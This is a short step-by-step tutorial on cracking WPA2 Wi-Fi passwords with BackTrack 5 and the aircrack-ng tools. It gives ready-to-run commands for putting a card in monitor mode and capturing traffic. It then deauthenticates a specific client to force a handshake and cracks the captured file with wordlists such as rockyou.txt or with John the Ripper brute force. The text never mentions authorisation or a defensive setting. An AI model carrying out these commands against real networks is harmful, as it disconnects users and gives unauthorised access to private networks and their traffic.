Cracking WPA2 Wi-Fi using BackTrack 5
Main requirement: BackTrack OS
Note: You must use a bootable pen drive with BackTrack or a dedicated BackTrack machine.
# STEP 1
iwconfig
# STEP 2
airmon-ng start wlan0
# STEP 3
airodump-ng mon0
# STEP 4
20:64:34:40:32:B4 is the MAC address (BSSID) of the access point.
# STEP 5
Open a new terminal and type: aireplay-ng -0 1 -a 20:64:34:40:32:B4 -c 78:DD:08:CD:60:0C mon0
Here 78:DD:08:CD:60:0C is the MAC address of the client. Once a WPA handshake is captured, the output looks like the following screenshot.
# STEP 6
Now the capturing part is over. In a new terminal type:
ls /tmp/wpacrack* -al
# STEP 7
Now the actual cracking takes place. You can close all the other terminals. The .cap file is the one we have to crack; for this we use aircrack-ng. There are two ways of doing this.
1) Dictionary attack. This executes quite fast but does not have a very high success rate, although basic passwords can be cracked this way. WPA/WPA2 cracking is only as good as the dictionary you are using. BackTrack supplies some dictionaries, but these might not be sufficient. Some dictionaries are "darkc0de.lst" and "rockyou.txt". You can find these files by typing: locate darkc0de. In place of darkc0de you can type whichever dictionary you want to find. You can also use custom-made dictionaries. The password will be cracked only if the passphrase is present in the dictionary.
code: aircrack-ng /tmp/wpacrack-01.cap -w /pentest/passwords/wordlists/darkc0de.lst
2) John the Ripper. This is another method with a much higher success ratio; however, it can take hours, days or months. It is very time consuming, and the cracking time depends on your hardware and the strength of the key. You can locate the john binary as mentioned before.
code: /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 20:64:34:40:32:B4 -w - /tmp/wpacrack-01.cap
Since you are not sure which dictionary file the passphrase may be in, you can run the aircrack-ng command above in different terminals with different dictionary file names.
After the cracking, the screen looks like the following screenshot.